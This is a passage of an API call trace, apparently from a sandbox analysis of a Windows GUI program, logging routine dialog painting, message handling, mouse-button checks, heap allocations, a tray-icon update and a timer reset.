nIndex=-21) returned 0 [0249.077] NtdllDialogWndProc_W () returned 0x0 [0249.153] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.153] NtdllDialogWndProc_W () returned 0x0 [0249.155] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.155] NtdllDialogWndProc_W () returned 0x0 [0249.155] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.155] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.155] NtdllDialogWndProc_W () returned 0x0 [0249.155] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.155] NtdllDialogWndProc_W () returned 0x0 [0249.155] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.155] NtdllDialogWndProc_W () returned 0x0 [0249.156] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.156] NtdllDialogWndProc_W () returned 0x0 [0249.158] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.158] NtdllDialogWndProc_W () returned 0x1 [0249.158] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.158] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.158] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.158] SetBkColor (hdc=0x37010775, color=0xf0f0f0) returned 0xffffff [0249.158] CreateSolidBrush (color=0xf0f0f0) returned 0x141001d3 [0249.158] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf89a0 [0249.159] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf89d0 [0249.159] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.159] NtdllDialogWndProc_W () returned 0x0 [0249.160] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.160] NtdllDialogWndProc_W () returned 0x0 [0249.162] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.162] NtdllDialogWndProc_W () returned 0x0 [0249.163] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.163] NtdllDialogWndProc_W () returned 0x1 [0249.163] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.163] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.163] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.163] SetBkColor (hdc=0x37010775, color=0xf0f0f0) returned 0xf0f0f0 [0249.164] GetForegroundWindow () returned 0x10058 [0249.164] IsIconic (hWnd=0x30150) returned 0 [0249.164] SetForegroundWindow (hWnd=0x30150) returned 1 [0249.168] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.168] NtdllDialogWndProc_W () returned 0x1 [0249.169] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.169] NtdllDialogWndProc_W () returned 0x0 [0249.169] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.169] NtdllDialogWndProc_W () returned 0x0 [0249.170] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.170] NtdllDialogWndProc_W () returned 0x1 [0249.170] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.170] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.170] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.170] SetBkColor (hdc=0x37010775, color=0xf0f0f0) returned 0xf0f0f0 [0249.171] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.171] NtdllDialogWndProc_W () returned 0x0 [0249.177] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a18 | out: hHeap=0xbe0000) returned 1 [0249.177] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d918 | out: hHeap=0xbe0000) returned 1 [0249.177] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0249.177] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.177] NtdllDialogWndProc_W () returned 0x0 [0249.177] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.177] NtdllDialogWndProc_W () returned 0x0 [0249.177] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.177] NtdllDialogWndProc_W () returned 0x0 [0249.177] TranslateMessage (lpMsg=0x8bf904) returned 0 [0249.177] DispatchMessageW (lpMsg=0x8bf904) returned 0x0 [0249.177] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0249.178] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.178] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.178] NtdllDialogWndProc_W () returned 0x0 [0249.178] IsDialogMessageW (hDlg=0x30150, lpMsg=0x8bf904) returned 1 [0249.178] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.178] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.178] NtdllDialogWndProc_W () returned 0x0 [0249.178] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0249.178] IsDialogMessageW (hDlg=0x30150, lpMsg=0x8bf904) returned 1 [0249.178] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.178] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.178] BeginPaint (in: hWnd=0x30150, lpPaint=0x8bf5f8 | out: lpPaint=0x8bf5f8) returned 0x37010775 [0249.178] EndPaint (hWnd=0x30150, lpPaint=0x8bf5f8) returned 1 [0249.178] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0249.178] IsDialogMessageW (hDlg=0x30150, lpMsg=0x8bf904) returned 1 [0249.179] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.179] NtdllDialogWndProc_W () returned 0x1 [0249.179] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.179] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.179] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.179] SetBkColor (hdc=0xf010267, color=0xf0f0f0) returned 0xffffff [0249.179] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.179] NtdllDialogWndProc_W () returned 0x0 [0249.179] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.180] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.180] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.180] SetBkColor (hdc=0xf010267, color=0xf0f0f0) returned 0xf0f0f0 [0249.180] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.180] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.180] GetWindowLongW (hWnd=0x3014e, nIndex=-21) returned 3 [0249.180] NtdllDialogWndProc_W () returned 0x0 [0249.180] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.180] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.180] GetWindowLongW (hWnd=0x3014e, nIndex=-21) returned 3 [0249.180] NtdllDialogWndProc_W () returned 0x0 [0249.181] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0249.181] IsDialogMessageW (hDlg=0x30150, lpMsg=0x8bf904) returned 1 [0249.182] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.182] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.182] GetWindowLongW (hWnd=0x20168, nIndex=-21) returned 4 [0249.182] GetWindowLongW (hWnd=0x20168, nIndex=-21) returned 4 [0249.182] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.182] SetTextColor (hdc=0x270101c5, color=0xff00) returned 0x0 [0249.182] SetBkColor (hdc=0x270101c5, color=0x0) returned 0xffffff [0249.182] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.182] NtdllDialogWndProc_W () returned 0x1 [0249.182] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.182] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.182] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.182] SetBkColor (hdc=0x270101c5, color=0xf0f0f0) returned 0x0 [0249.182] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.182] NtdllDialogWndProc_W () returned 0x0 [0249.183] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.184] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.184] GetWindowLongW (hWnd=0x20168, nIndex=-21) returned 4 [0249.184] GetWindowLongW (hWnd=0x20168, nIndex=-21) returned 4 [0249.184] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.184] SetTextColor (hdc=0x270101c5, color=0xff00) returned 0x0 [0249.184] SetBkColor (hdc=0x270101c5, color=0x0) returned 0xffffff [0249.184] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.184] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.184] GetWindowLongW (hWnd=0x20168, nIndex=-21) returned 4 [0249.184] GetWindowLongW (hWnd=0x20168, nIndex=-21) returned 4 [0249.184] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.184] SetTextColor (hdc=0x270101c5, color=0xff00) returned 0xff00 [0249.184] SetBkColor (hdc=0x270101c5, color=0x0) returned 0x0 [0249.184] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.184] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.184] GetWindowLongW (hWnd=0x20168, nIndex=-21) returned 4 [0249.184] GetWindowLongW (hWnd=0x20168, nIndex=-21) returned 4 [0249.184] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.184] SetTextColor (hdc=0x270101c5, color=0xff00) returned 0xff00 [0249.184] SetBkColor (hdc=0x270101c5, color=0x0) returned 0x0 [0249.194] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0249.194] IsDialogMessageW (hDlg=0x30150, lpMsg=0x8bf904) returned 1 [0249.194] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.194] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.194] GetWindowLongW (hWnd=0x2016a, nIndex=-21) returned 5 [0249.194] GetWindowLongW (hWnd=0x2016a, nIndex=-21) returned 5 [0249.194] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.194] SetTextColor (hdc=0x43010772, color=0x0) returned 0x0 [0249.194] SetBkColor (hdc=0x43010772, color=0xf0f0f0) returned 0xffffff [0249.217] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0249.217] IsDialogMessageW (hDlg=0x30150, lpMsg=0x8bf904) returned 1 [0249.218] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.218] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.218] GetWindowLongW (hWnd=0x2015e, nIndex=-21) returned 6 [0249.218] GetWindowLongW (hWnd=0x2015e, nIndex=-21) returned 6 [0249.218] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.218] GetWindowLongW (hWnd=0x2015e, nIndex=-16) returned 1342242944 [0249.218] GetSysColor (nIndex=5) returned 0xffffff [0249.218] GetSysColor (nIndex=8) returned 0x0 [0249.218] SetTextColor (hdc=0x43010772, color=0x0) returned 0x0 [0249.218] SetBkColor (hdc=0x43010772, color=0xffffff) returned 0xffffff [0249.218] CreateSolidBrush (color=0xffffff) returned 0x13100700 [0249.218] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf8a18 [0249.218] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf88e0 [0249.219] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.220] NtdllDialogWndProc_W () returned 0x1 [0249.220] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.220] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.220] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.220] SetBkColor (hdc=0x2f0106ff, color=0xf0f0f0) returned 0xffffff [0249.220] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.220] NtdllDialogWndProc_W () returned 0x0 [0249.220] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.220] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.220] GetWindowLongW (hWnd=0x2015e, nIndex=-21) returned 6 [0249.220] GetWindowLongW (hWnd=0x2015e, nIndex=-21) returned 6 [0249.220] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.220] GetWindowLongW (hWnd=0x2015e, nIndex=-16) returned 1342242944 [0249.221] GetSysColor (nIndex=5) returned 0xffffff [0249.221] GetSysColor (nIndex=8) returned 0x0 [0249.221] SetTextColor (hdc=0x300106ff, color=0x0) returned 0x0 [0249.221] SetBkColor (hdc=0x300106ff, color=0xffffff) returned 0xffffff [0249.543] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0249.594] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.594] NtdllDialogWndProc_W () returned 0x0 [0249.594] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.594] NtdllDialogWndProc_W () returned 0x1 [0249.594] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.594] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.594] NtdllDialogWndProc_W () returned 0x0 [0249.594] IsDialogMessageW (hDlg=0x30150, lpMsg=0x8bf904) returned 1 [0249.595] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.595] NtdllDialogWndProc_W () returned 0x0 [0249.595] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0249.595] TranslateMessage (lpMsg=0x8bf904) returned 0 [0249.595] DispatchMessageW (lpMsg=0x8bf904) returned 0x0 [0249.595] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0249.596] IsDialogMessageW (hDlg=0x30150, lpMsg=0x8bf904) returned 1 [0249.596] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.596] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.596] GetWindowLongW (hWnd=0x3014e, nIndex=-21) returned 3 [0249.596] IsWindow (hWnd=0x3014e) returned 1 [0249.596] IsWindowEnabled (hWnd=0x3014e) returned 1 [0249.596] GetCursorPos (in: lpPoint=0x8bf49c | out: lpPoint=0x8bf49c*(x=530, y=535)) returned 1 [0249.596] ScreenToClient (in: hWnd=0x30150, lpPoint=0x8bf49c | out: lpPoint=0x8bf49c) returned 1 [0249.596] GetAsyncKeyState (vKey=1) returned 1 [0249.596] GetAsyncKeyState (vKey=2) returned 0 [0249.596] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x24) returned 0xe08b98 [0249.596] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8880 [0249.596] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53290 [0249.596] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe532c0 [0249.596] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0249.596] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.596] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.596] NtdllDialogWndProc_W () returned 0x0 [0249.597] IsDialogMessageW (hDlg=0x30150, lpMsg=0x8bf904) returned 1 [0249.597] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0249.597] IsDialogMessageW (hDlg=0x30150, lpMsg=0x8bf904) returned 1 [0249.597] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.597] NtdllDialogWndProc_W () returned 0x1 [0249.597] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.597] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.597] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.597] SetBkColor (hdc=0x310106ff, color=0xf0f0f0) returned 0xffffff [0249.597] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.597] NtdllDialogWndProc_W () returned 0x0 [0249.598] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.598] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.598] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.598] SetBkColor (hdc=0x310106ff, color=0xf0f0f0) returned 0xf0f0f0 [0249.598] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.598] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.598] GetWindowLongW (hWnd=0x3014e, nIndex=-21) returned 3 [0249.598] NtdllDialogWndProc_W () returned 0x0 [0249.598] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.598] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.598] GetWindowLongW (hWnd=0x3014e, nIndex=-21) returned 3 [0249.598] NtdllDialogWndProc_W () returned 0x0 [0249.599] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0249.599] IsDialogMessageW (hDlg=0x30150, lpMsg=0x8bf904) returned 1 [0249.599] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.599] NtdllDialogWndProc_W () returned 0x1 [0249.600] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.600] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.600] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.600] SetBkColor (hdc=0x320106ff, color=0xf0f0f0) returned 0xffffff [0249.600] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.600] NtdllDialogWndProc_W () returned 0x0 [0249.600] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.600] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.600] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.600] SetBkColor (hdc=0x320106ff, color=0xf0f0f0) returned 0xf0f0f0 [0249.600] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.600] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.600] GetWindowLongW (hWnd=0x2010a, nIndex=-21) returned 7 [0249.600] NtdllDialogWndProc_W () returned 0x0 [0249.600] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.600] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.600] GetWindowLongW (hWnd=0x2010a, nIndex=-21) returned 7 [0249.601] NtdllDialogWndProc_W () returned 0x0 [0249.601] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0249.602] IsDialogMessageW (hDlg=0x30150, lpMsg=0x8bf904) returned 1 [0249.602] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.602] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.602] GetWindowLongW (hWnd=0x300a2, nIndex=-21) returned 8 [0249.602] GetWindowLongW (hWnd=0x300a2, nIndex=-21) returned 8 [0249.602] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.602] GetWindowLongW (hWnd=0x300a2, nIndex=-16) returned 1342179332 [0249.602] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.602] GetSysColor (nIndex=8) returned 0x0 [0249.602] SetTextColor (hdc=0xd010720, color=0x0) returned 0x0 [0249.602] SetBkColor (hdc=0xd010720, color=0xf0f0f0) returned 0xffffff [0249.603] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.603] NtdllDialogWndProc_W () returned 0x1 [0249.603] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.603] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.604] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.604] SetBkColor (hdc=0x11010267, color=0xf0f0f0) returned 0xffffff [0249.604] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.604] NtdllDialogWndProc_W () returned 0x0 [0249.605] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.605] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.605] GetWindowLongW (hWnd=0x300a2, nIndex=-21) returned 8 [0249.605] GetWindowLongW (hWnd=0x300a2, nIndex=-21) returned 8 [0249.605] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.605] GetWindowLongW (hWnd=0x300a2, nIndex=-16) returned 1342179332 [0249.605] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.605] GetSysColor (nIndex=8) returned 0x0 [0249.605] SetTextColor (hdc=0xd010720, color=0x0) returned 0x0 [0249.605] SetBkColor (hdc=0xd010720, color=0xf0f0f0) returned 0xffffff [0249.606] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.606] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.606] GetWindowLongW (hWnd=0x300a2, nIndex=-21) returned 8 [0249.606] GetWindowLongW (hWnd=0x300a2, nIndex=-21) returned 8 [0249.606] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.606] GetWindowLongW (hWnd=0x300a2, nIndex=-16) returned 1342179332 [0249.606] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.606] GetSysColor (nIndex=8) returned 0x0 [0249.606] SetTextColor (hdc=0xd010720, color=0x0) returned 0x0 [0249.606] SetBkColor (hdc=0xd010720, color=0xf0f0f0) returned 0xf0f0f0 [0249.606] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.606] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.606] GetWindowLongW (hWnd=0x300a2, nIndex=-21) returned 8 [0249.606] GetWindowLongW (hWnd=0x300a2, nIndex=-21) returned 8 [0249.606] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.606] GetWindowLongW (hWnd=0x300a2, nIndex=-16) returned 1342179332 [0249.606] GetSysColor (nIndex=15) returned 0xf0f0f0 [0249.606] GetSysColor (nIndex=8) returned 0x0 [0249.606] SetTextColor (hdc=0xd010720, color=0x0) returned 0x0 [0249.606] SetBkColor (hdc=0xd010720, color=0xf0f0f0) returned 0xf0f0f0 [0249.612] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0249.612] TranslateMessage (lpMsg=0x8bf904) returned 0 [0249.612] DispatchMessageW (lpMsg=0x8bf904) returned 0x0 [0249.612] GetForegroundWindow () returned 0x30150 [0249.612] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0249.612] GetCursorPos (in: lpPoint=0x8bf740 | out: lpPoint=0x8bf740*(x=530, y=535)) returned 1 [0249.612] ScreenToClient (in: hWnd=0x30150, lpPoint=0x8bf740 | out: lpPoint=0x8bf740) returned 1 [0249.612] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x24) returned 0xe08bc8 [0249.612] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6378 [0249.612] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53230 [0249.612] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53280 [0249.612] GetAsyncKeyState (vKey=1) returned 0 [0249.613] GetAsyncKeyState (vKey=2) returned 0 [0249.613] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0249.613] IsDialogMessageW (hDlg=0x30150, lpMsg=0x8bf904) returned 0 [0249.613] TranslateMessage (lpMsg=0x8bf904) returned 0 [0249.613] DispatchMessageW (lpMsg=0x8bf904) returned 0x0 [0249.613] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20a) returned 0xe75c48 [0249.613] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53200 [0249.613] Shell_NotifyIconW (dwMessage=0x1, lpData=0x8befa0) returned 1 [0249.613] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe75c48 | out: hHeap=0xbe0000) returned 1 [0249.613] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53200 | out: hHeap=0xbe0000) returned 1 [0249.613] KillTimer (hWnd=0x5014a, uIDEvent=0x1) returned 1 [0249.613] SetTimer (hWnd=0x5014a, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0249.614] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0249.614] IsDialogMessageW (hDlg=0x30150, lpMsg=0x8bf904) returned 0 [0249.614] TranslateMessage (lpMsg=0x8bf904) returned 0 [0249.614] DispatchMessageW (lpMsg=0x8bf904) returned 0x0 [0249.614] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0249.614] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d918 [0249.614] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf63a8 [0249.614] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53200 [0249.614] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf63a8 | out: hHeap=0xbe0000) returned 1 [0249.614] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d580 [0249.614] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf63a8 [0249.614] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf88b0 [0249.614] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe531c0 [0249.614] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531c0 | out: hHeap=0xbe0000) returned 1 [0249.614] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe531c0 [0249.614] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531c0 | out: hHeap=0xbe0000) returned 1 [0249.614] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf88b0 | out: hHeap=0xbe0000) returned 1 [0249.614] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe531c0 [0249.614] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x214) returned 0xe75c48 [0249.614] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe531d0 [0249.615] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe531b0 [0249.615] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf88b0 [0249.615] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe531b0 | out: hHeap=0xbe0000) returned 1 [0249.615] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf88c8 [0249.615] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf88f8 [0249.615] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6588 